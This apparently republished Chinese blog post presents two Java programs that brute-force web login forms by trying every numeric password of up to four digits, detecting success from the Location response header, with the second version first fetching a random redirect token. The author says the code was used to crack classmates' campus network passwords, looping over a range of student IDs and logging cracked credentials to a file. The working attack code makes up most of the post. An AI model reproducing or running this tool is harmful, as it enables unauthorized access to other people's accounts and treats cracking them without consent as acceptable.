2. 程式人生 > >java網路程式設計五:暴力法破解登入系統的完全實現(木子)

java網路程式設計五:暴力法破解登入系統的完全實現(木子)

阿新 發佈:2019-01-04

注:以下破解思路及程式碼源自我同學木子

1、先來看一個無任何安全措施的登入系統的破解方法:每次模擬表單提交,若登入成功,此時返回的報頭資訊中有Location欄位,登入失敗無此欄位,繼續模擬登入。直到破解成功,本人成功破解部分同學校園網登入密碼(純四位數字的)程式碼如下:

  1. <span style="font-size:16px;">package demo.net;  
  2. import java.io.IOException;  
  3. import java.io.PrintWriter;  
  4. import java.net.HttpURLConnection;  
  5. import
     java.net.URL;  
  6. import mine.util.io.TextFile;  
  7. //暴力法破解簡單登入系統:該系統無任何安全措施
  8. publicclass PostTest {  
  9.     String urlString = "登入頁面的url";  
  10.     public PostTest() {  
  11.     }  
  12.     public PostTest(String urlString) {  
  13.         this.urlString = urlString;  
  14.     }  
  15.     // 提交一次使用者請求
  16.     privateboolean doPost(String user, String password) {  
  17.         boolean sucess = false;  
  18.         try {  
  19.             URL realUrl = new URL(urlString);  
  20.             HttpURLConnection conn = (HttpURLConnection) realUrl  
  21.                     .openConnection();  
  22.             conn.setDoOutput(true);  
  23.             conn.setDoInput(true);  
  24.             conn.setInstanceFollowRedirects(false
    );  
  25.             // 提交表單,傳送的資料是直接用Firebug擷取的然後把使用者名稱,密碼部分換成引數
  26.             PrintWriter out = new PrintWriter(conn.getOutputStream());  
  27.             out.print("要提交的表單資訊");  
  28.             out.flush();  
  29.             // 如果登入不成功,報頭中沒有Location欄位,getHeaderField("Location") 返回null
  30.             // 登入成功,返回一個隨機的Location欄位
  31.             // System.out.println(conn.getHeaderFields());
  32.             if (conn.getHeaderField("Location") != null) {  
  33.                 sucess = true;  
  34.             }  
  35.         } catch (IOException e) {  
  36.             e.printStackTrace();  
  37.         }  
  38.         return sucess;  
  39.     }  
  40.     // 這是一個全排列演算法, 對特定長度的密碼排列組合,把結果存入list
  41.     // user:使用者名稱 , n:字元下標 , len:字元陣列長度,也就是密碼長度
  42.     privateboolean createPassWord(String user, char[] str, int n, int len) {  
  43.         if (n == len) {  
  44.             String ps = new String(str);  
  45.             if (doPost(user, ps)) {  
  46. //              System.out.println("sucess:" + user + " : " + ps);
  47.                 TextFile.write("file/校園網使用者名稱及密碼.txt"true"sucess:" + user  
  48.                         + " : " + ps + "\n");  
  49.                 returntrue;  
  50.             }  
  51.             returnfalse;  
  52.         }  
  53.         for (int i = 0; i <= 9; i++) {  
  54.             str[n] = (char) (i + '0');  
  55.             if (createPassWord(user, str, n + 1, len))  
  56.                 returntrue;  
  57.         }  
  58.         returnfalse;  
  59.     }  
  60.     // 破解一個使用者的密碼
  61.     publicvoid test(String user) {  
  62.         for (int i = 0; i < 4; i++) {  
  63.             if (createPassWord(user, newchar[i + 1], 0, i + 1))  
  64.                 break;  
  65.         }  
  66.     }  
  67.     publicstaticvoid main(String[] args) {  
  68.         PostTest pt = new PostTest();  
  69.         for (int i = 1; i <= 9; i++)  
  70.             pt.test("09050510" + i);  
  71.         for (int i = 10; i <= 31; i++)  
  72.             pt.test("0905051" + i);  
  73.     }  
  74. }  
  75. </span>  

這個示例程式碼中只破解密碼為4位或4位數字之內的密碼,大概破解一個使用者需要十分鐘。如果破解5、6...更長的密碼,破解時間將很長。

注:以下破解思路及程式碼源自我同學木子

2、在有些登入系統會採用安全措施,每次登入都會在url上產生一個隨機值,該值為報頭資訊中的Location欄位的值,所以破解時要先獲得該值,然後組成真正的url給伺服器傳送表單資訊,這裡要進行兩次連線,第一次獲取Location欄位的值,第二次才是真正的模擬登入。注意要御製重定向。程式碼如下:

  1. <span style="font-size:16px;">package demo.net;  
  2. import java.io.IOException;  
  3. import java.io.PrintWriter;  
  4. import java.net.HttpURLConnection;  
  5. import java.net.URL;  
  6. //暴力法破解登入系統:該登入系統的特徵是報頭資訊中有Location欄位,該欄位的值隨機生成
  7. publicclass HttpTest {  
  8.     //要破解的登入系統的url
  9.     String urlString = "要破解的系統的url";  
  10.     public HttpTest() {  
  11.     }  
  12.     public HttpTest(String urlString) {  
  13.         this.urlString = urlString;  
  14.     }  
  15.     // 提交一次使用者請求
  16.     privateboolean doPost(String user, String password) {  
  17.         boolean sucess = false;  
  18.         try {  
  19.             // 先通過url獲取head中Location欄位,這個欄位是隨機的,每次連線都不一樣
  20.             URL url = new URL(urlString);  
  21.             HttpURLConnection connection = (HttpURLConnection) url  
  22.                     .openConnection();  
  23.             connection.setRequestMethod("HEAD");  
  24.             connection.setInstanceFollowRedirects(false);// 不讓重定向,這樣才會返回Location欄位資訊
  25.             connection.connect();  
  26.             // 通過獲取的Location欄位的資訊構造真正提交表單的url
  27.             URL realUrl = new URL(urlString  
  28.                     + connection.getHeaderField("Location"));  
  29.             HttpURLConnection conn = (HttpURLConnection) realUrl  
  30.                     .openConnection();  
  31.             conn.setDoOutput(true);  
  32.             conn.setDoInput(true);  
  33.             conn.setInstanceFollowRedirects(false);  
  34.             // 提交表單,傳送的資料是直接用Firebug擷取的然後把使用者名稱,密碼部分換成引數
  35.             PrintWriter out = new PrintWriter(conn.getOutputStream());  
  36.             out.print("登入時提交的表單資訊");  
  37.             out.flush();  
  38.             // 如果登入不成功,報頭中沒有Location欄位,getHeaderField("Location") 返回null
  39.             // 登入成功,返回一個隨機的Location欄位
  40.             // System.out.println(conn.getHeaderFields());
  41.             if (conn.getHeaderField("Location") != null) {  
  42.                 sucess = true;  
  43.             }  
  44.         } catch (IOException e) {  
  45.             e.printStackTrace();  
  46.         }  
  47.         return sucess;  
  48.     }  
  49.     // 這是一個全排列演算法, 對特定長度的密碼排列組合,把結果存入list
  50.     // user:使用者名稱 , n:字元下標 , len:字元陣列長度,也就是密碼長度
  51.     privateboolean createPassWord(String user, char[] str, int n, int len) {  
  52.         if (n == len) {  
  53.             String ps = new String(str);  
  54.             if (doPost(user, ps)) {  
  55.                 System.out.println("sucess:" + user + " : " + ps);  
  56.                 returntrue;  

  57. 相關推薦

    java網路程式設計暴力破解登入系統完全實現()

    注:以下破解思路及程式碼源自我同學木子 1、先來看一個無任何安全措施的登入系統的破解方法:每次模擬表單提交,若登入成功,此時返回的報頭資訊中有Location欄位,登入失敗無此欄位,繼續模擬登入。直到破解成功,本人成功破解部分同學校園網登入密碼(純四位數字的)程式碼如下

    Java網路程式設計JDK API實現OIO和NIO

    前言 網路程式設計是Java的一大難點,JDK自帶的api可以實現網路程式設計。 我們將從一個應用程式開始我們對傳輸的學習,這個應用程式只簡單地接受連線,然後向客戶端寫“Hi!”,然後關閉連線。 1. OIO實現 應用程式的阻塞(OIO)版程式碼如下: package

    Java網路程式設計Netty實現OIO和NIO

    承接上文:https://blog.csdn.net/hxcaifly/article/details/85274664 前言 單純地使用Java JDK來實現網路NIO是一件開發成本非常高的事情。然而,Netty 為它所有的傳輸實現提供了一個通用API,這使得這種

    Java網路程式設計()socket的半包,粘包與分包的問題

    首先看兩個概念: 短連線:連線->傳輸資料->關閉連線    HTTP是無狀態的,瀏覽器和伺服器每進行一次HTTP操作,就建立一次連線,但任務結束就中斷連線。    也可以這樣說:短連線是指SOCKET連線後傳送後接收完資料後馬上斷開連線。 長連線:連線-&g

    JAVA併發程式設計()建立執行緒的第三種方式實現Callable介面

    眾所周知建立執行緒的方式有兩種:1.繼承Thread類。2.實現Runnable介面。從jdk1.5開始,提供了另一種建立執行緒的方式。今天我們就來看看這第三種方式:實現Callable介面 一、Callable與Runnable 我們直接來看一個使用C

    java網路程式設計(一)java傳統的阻塞IO以及多執行緒解決方案

    最近在看一些IO模型相關的東西,被同步IO、非同步IO、阻塞IO、非阻塞IO概念弄的有點暈,後面再慢慢學習和領悟。我們以socket IO程式設計為例子,我用的是JDK1.7.0_80,測試工具用的是

    Java網路程式設計(2)TCP和UDP

    1、多執行緒“服務端-客戶端”   TCP客戶端使用Socket來連線伺服器和與伺服器通訊。以下為在主執行緒中將使用者輸入傳送給服務端,在建立的執行緒中將服務端發回的資料輸出來: import java.net.*; import java.io.*; class Cl

    Java 網路程式設計(1)使用 NetworkInterface 獲得本機在區域網內的 IP 地址

    原文地址:https://segmentfault.com/a/1190000007462741 1、問題提出 在使用 Java 開發網路程式時,有時候我們需要知道本機在區域網中的 IP 地址。很常見的一種做法是呼叫本地命令(比如 Windows 上的 ipconfig 命令和 Li

    Java網路程式設計入門()之TCP程式設計——複用Socket連線

    如何複用Socket連線? 在前面的示例中,客戶端中建立了一次連線,只發送一次資料就關閉了,這就相當於撥打電話時,電話打通了只對話一次就關閉了,其實更加常用的應該是撥通一次電話以後多次對話,這就是複用客戶端連線。 那 麼如何實現建立一次連線,進行多次資料交換呢?其實很簡單

    Java網路程式設計UDP DatagramSocket

    原文地址 DatagramSocket類是java通過UDP通訊的途徑。UDP仍位於IP層的上面。 你可以用DatagramSocket類傳送和接收UDP資料包。 UDP 和TCP UDP工作方式和TCP有點不同。當你通過TCP傳送資料時,你先要建立連線。一旦TCP連線建立了,TCP會保證你的

    java網路程式設計1、計算機網路網路通訊的組成?什麼是ip、協議、埠號?

    宣告:本教程不收取任何費用,歡迎轉載,尊重作者勞動成果,不得用於商業用途,侵權必究!!! 文章目錄 計算機網路 網路ip 網路協議 網路埠號 計算機網路 計算機網路是相互連線的獨立自主的計算機的集合,最簡單的網路形式由兩臺計算機組成。如下圖: 一臺計算機

    Java基礎java網路程式設計IO總結(BIO、NIO、AIO)

    1.基本概念 在Java網路通訊中,最基本的概念就是Socket程式設計了。Socket又稱“套接字” 向網路發出請求或者應答網路請求。 Socket 和ServerSocket類庫位於 Java.net 包中。ServerSocket用於伺服器端,Socket是建立網路連線時使用的

    java網路程式設計13、基於UDP的socket程式設計(三)實現相互發送接收訊息

    宣告:本教程不收取任何費用,歡迎轉載,尊重作者勞動成果,不得用於商業用途,侵權必究!!! 文章目錄 一、前言 二、基於UDP伺服器端程式的編寫 三、基於UDP客戶端程式的編寫 四、測試列印 五、系列文章(java網路程式設計) 通過上兩篇文章:1、瞭解了基於UDP

    java網路程式設計12、基於UDP的socket程式設計(二)程式碼通訊-簡單例項

    宣告:本教程不收取任何費用,歡迎轉載,尊重作者勞動成果,不得用於商業用途,侵權必究!!! 文章目錄 一、基於UDP伺服器端程式的編寫 二、基於UDP客戶端程式的編寫 三、系列文章(java網路程式設計) 通過上篇文章瞭解了基於UDP通訊的理論、基本步驟以及它跟TCP的區別

    java網路程式設計11、基於UDP的socket程式設計(一)理論、基本步驟

    宣告:本教程不收取任何費用,歡迎轉載,尊重作者勞動成果,不得用於商業用途,侵權必究!!! 文章目錄 一、基於UDP的socket程式設計 二、基本步驟 三、系列文章(java網路程式設計) 一、基於UDP的socket程式設計 對於基於UDP通訊來說,通訊雙方不需要建

    java網路程式設計10、基於TCP的socket程式設計(三)緩衝流、flush方法、關閉流

    宣告:本教程不收取任何費用,歡迎轉載,尊重作者勞動成果,不得用於商業用途,侵權必究!!! 文章目錄 一、使用緩衝流、註釋流的關閉—帶來的效果 二、使用flush方法—帶來的效果 三、關閉流—帶來的效果 四、系列文章(java網路程式設計) 上篇講了基於tcp的程式設計

    java網路程式設計9、基於TCP的socket程式設計(二)伺服器端迴圈監聽接收多個客戶端_多執行緒伺服器程式

    宣告:本教程不收取任何費用,歡迎轉載,尊重作者勞動成果,不得用於商業用途,侵權必究!!! 文章目錄 一、核心程式碼編寫 1、伺服器端程式的編寫 2、客戶端程式的編寫 3、測試列印輸出 二、系列文章(java網路程式設計) 上篇講了基於tcp的程式設計的一些基礎知識

    java網路程式設計8、基於TCP的socket程式設計(一)簡單的socket通訊_一個客戶端

    宣告:本教程不收取任何費用,歡迎轉載,尊重作者勞動成果,不得用於商業用途,侵權必究!!! 文章目錄 一、基於tcp的程式設計,就好像用電話進行交談一樣 二、在java中用於程式設計網路程式的類 三、套接字 + (輸出、輸入流) 1、伺服器程式編寫基本步驟: 2、客戶端程式

    Java 網路程式設計) 使用TCP/IP的套接字(Socket)進行通訊

    使用TCP/IP的套接字(Socket)進行通訊 套接字Socket的引入   為了能夠方便地開發網路應用軟體,由美國伯克利大學在Unix上推出了一種應用程式訪問通訊協議的作業系統用呼叫socket(套接字)。   socket的出現,使程式設計師可以很方便地訪問TCP/

    Java網路程式設計和NIO詳解開篇Java網路程式設計基礎

    老曹眼中的網路程式設計基礎 轉自:https://mp.weixin.qq.com/s/XXMz5uAFSsPdg38bth2jAA 我們是幸運的,因為我們擁有網路。網路是一個神奇的東西,它改變了你和我的生活方式,改變了整個世界。 然而,網路的無標度和